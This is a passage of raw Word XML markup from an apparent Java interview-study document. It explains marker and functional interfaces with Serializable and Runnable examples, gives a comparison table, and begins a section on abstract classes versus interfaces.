        <w:t xml:space="preserve"> The primary purpose of a marker interface is to provide metadata or a "marker" that can be checked at runtime using reflection or other techniques. A class implementing a marker interface indicates that it should be treated in a certain way by the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDD183D" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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1BF7BF5E" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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rializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface is a typical marker interface. It marks the class as serializable, and the JVM knows that such a class can be converted to a byte stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A753F82" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Serializable {}  // Marker Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F122735" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0676F2F3" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Person implements Serializable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C530DD3" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39461E4F" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205A18D" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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D138ACB" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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 the Serializable interface does not contain any methods. The Person class implements it to indicate that instances of Person can be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C06F27" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E750A1A" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tains no methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11669B" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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to mark or tag classes for specific behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A1602" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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behavior is typically handled by other components in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B326E" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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2. Functional Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface that contains exactly one abstract method. It can have multiple default or static methods, but only one abstract method. It is used to represent a single function or action and is typically used with lambda expressions in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA686C" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The primary purpose of a functional interface is to represent a single operation or action that can be passed around as a lambda expression or method reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4D57F" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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3CDF2FF2" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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Runnable interface is an example of a functional interface, which has a single abstract method run().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F2357" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663BA4EF" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193346FC" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F36E313" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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7B22C36" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69570B6D" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Task implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E3F72" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4D300" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F97FE" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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646C1D1" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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38640E5" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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 Runnable is a functional interface with a single abstract method run(). It can be implemented using a lambda expression like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00748675" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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unnable task = () -&gt; System.out.println("Task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156F453" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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ask.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7C202" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090AB25D" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tains exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A695DAB" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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contain multiple default or static methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B58B1" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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be used with lambda expressions or method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6439B" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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presented using @FunctionalInterface annotation (optional, but recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C9230" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009A5F7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3DC9843">
          <v:rect id="_x0000_i1193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20FF1A" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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parison of Marker Interface vs Functional Interfa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5"/>
        <w:gridCol w:w="4544"/>
        <w:gridCol w:w="4545"/>
      </w:tblGrid>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="0F501950" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE73CBE" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08123CFD" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Marker Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBA620B" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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unctional Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="62789CE6" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE7D953" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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inition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F88EEA9" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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n interface with no methods (empty interface).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7338BB5C" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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n interface with exactly one abstract method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="6A0072FF" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482813B9" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="448976D3" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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to mark or tag a class with a special property or behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68A05597" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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to represent a single operation that can be passed around and executed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="5C296CC6" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E48851E" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F2799A1" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D3D8524" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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e abstract method, can have multiple default/static methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="6D5FCA7E" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3ED8B3" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520C0CAA" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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rializable, Cloneable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334EB418" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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unnable, Callable, Comparator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="3F64F9ED" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE83272" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE3FDD3" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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es implementing the interface are recognized by the system for specific behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518D939E" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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primarily in lambda expressions or method references.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="25B89710" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD4D7A9" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43622AB6" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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annotation required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="280D6A6D" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F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ypically annotated with @FunctionalInterface (optional).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="358814E2" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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 Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095F44C" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Marker Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not define any methods and is used to mark a class for specific behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9EB6A" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains exactly one abstract method and is used to represent a single operation, commonly used with lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C3B4E" w14:textId="747F1942" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00342FA5">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5F57465">
          <v:rect id="_x0000_i1194" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC1CBF" w14:textId="08B6E351" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E268DE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc196307546"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00DD377C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between Abstract class and Interface? Explain with scenarios which one you will it be used with conditions</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="7AA21DD4" w14:textId="7F2F2ACD" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">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both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstract classe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interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to define common behavior and structure for classes. However, there are some significant differences between the two, and each has its own use cases. Let's explore the differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F59D5" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E758B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4AA1D1E">
          <v:rect id="_x0000_i1195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06181F" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD82BA3" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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bstract Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EE5E7" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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n abstract class is a class that cannot be instantiated on its own and may contain both abstract (unimplemented) and concrete (implemented) methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96B905" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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can have state (instance variables) and behaviors (methods) that can be inherited by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044B016" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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terface:</w:t>
      </w:r>
    </w:p>
